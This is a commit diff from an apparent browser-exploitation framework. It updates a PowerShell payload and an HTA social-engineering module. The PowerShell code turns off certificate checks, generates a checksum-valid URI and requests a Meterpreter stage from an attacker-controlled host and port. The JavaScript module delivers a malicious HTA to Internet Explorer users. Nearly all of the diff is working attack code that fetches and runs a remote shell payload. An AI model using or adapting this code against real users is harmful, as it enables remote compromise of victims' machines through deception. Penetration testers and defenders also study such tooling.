updated hta_powershell to use updated powersploit so it can properly create sessions

2015-06-12 19:07:02 +00:00
parent c75b7a633d
commit 6bdf829126
2 changed files with 32 additions and 4 deletions
--- a/extensions/social_engineering/powershell/powershell_payload
+++ b/extensions/social_engineering/powershell/powershell_payload
@@ -400,13 +400,41 @@ function Invoke-ps
            {
                $SSL = 's'
                # Accept invalid certificates
-                [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
+                [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
            }
        }
        
        # Meterpreter expects 'INITM' in the URI in order to initiate stage 0. Awesome authentication, huh?
-        $Request = "http$($SSL)://$($Lhost):$($Lport)/INITM"
-        Write-Verbose "Requesting meterpreter payload from $Request"
+        # # $Request = "http$($SSL)://$($Lhost):$($Lport)/INITM"
+        # # Write-Verbose "Requesting meterpreter payload from $Request"
+	$chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()
+	$x = ""
+		function sum($v){
+		  return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum % 0x100 -eq 92)
+		}
+		
+		function RandomChars{
+		  $f = "";1..3 | foreach-object {$f+= $chars[(Get-Random -maximum $chars.Length)]};
+		  return $f;
+		}
+		
+		function RandomArray { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}
+		
+		function Generate{
+		for ($i=0; $i -lt 64; $i++){
+		    $h = RandomChars;$k = $d | RandomArray; 
+			foreach ($l in $k){
+			    $s = $h + $l; if (sum($s)){ 
+				return $s}
+			     }
+				return "9vXU";
+	              }	 
+		}
+
+	
+	    $GeneratedURI = Generate; 
+        $Request = "http$($SSL)://$($Lhost):$($Lport)/$GeneratedURI"
+	    Write-Verbose "Requesting meterpreter payload from $Request"
        
        $Uri = New-Object Uri($Request)
        $WebClient = New-Object System.Net.WebClient
--- a/modules/social_engineering/hta_powershell/command.js
+++ b/modules/social_engineering/hta_powershell/command.js
@@ -6,7 +6,7 @@

 beef.execute(function () {

-    var hta_url = '<%= @ps_url %>' + '/hta';
+    var hta_url = '<%= @domain %>' + '<%= @ps_url %>' + '/hta';

    if (beef.browser.isIE()) {
        // application='yes' is IE-only and needed to load the HTA into an IFrame.